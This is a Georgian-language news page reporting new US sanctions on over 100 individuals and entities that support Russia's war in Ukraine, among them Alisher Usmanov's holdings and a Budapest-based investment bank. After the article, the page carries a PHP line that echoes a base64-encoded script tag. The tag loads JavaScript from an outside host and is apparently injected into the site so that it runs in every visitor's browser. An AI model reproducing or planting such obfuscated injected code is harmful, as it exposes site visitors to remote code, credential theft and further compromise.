celsiusi
ავერსი საქკაბელი

აშშ ახალ სანქციებს აწესებს იმ კომპანიების მიმართ, რომლებიც რუსეთს უკრაინაში ომის საწარმოებლად ეხმარებიან.

 

„ბიბისის“ ცნობით, სასანქციო სიაში 100-ზე მეტი ფიზიკური პირი და ორგანიზაციაა, რომლებიც ამა თუ იმ გზით მხარს უჭერენ რუსეთის სამხედრო კამპანიას უკრაინაში.

 

ე.წ. შავ სიაში მილიარდერ ალიშერ უსმანოვის იმპერიაც მოხვდა, რომელიც, აშშ-ის სახაზინო დეპარტამენტის ცნობით, ვლადიმერ პუტინთან დაახლოებული პირია და უკრაინაში ომისთვის ფინანსურ წყაროსაც წარმოადგენს.

 

მედიის ცნობით, სანქციები უწესდებათ ჩინურ, თურქულ, არაბულ კომპანიებსაც, რომლებიც რუსეთის სამხედრო-სამრეწველო კომპლექსს სანქციებისთვის თავის არიდებაში ეხმარებიან.

 

სიაში მოხვდა ასევე საერთაშორისო საინვესტიციო ბანკი, რომელიც ბუდაპეშტშია ბაზირებული, თუმცა კრემლის დაქვემდებარებაშია. 

274
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");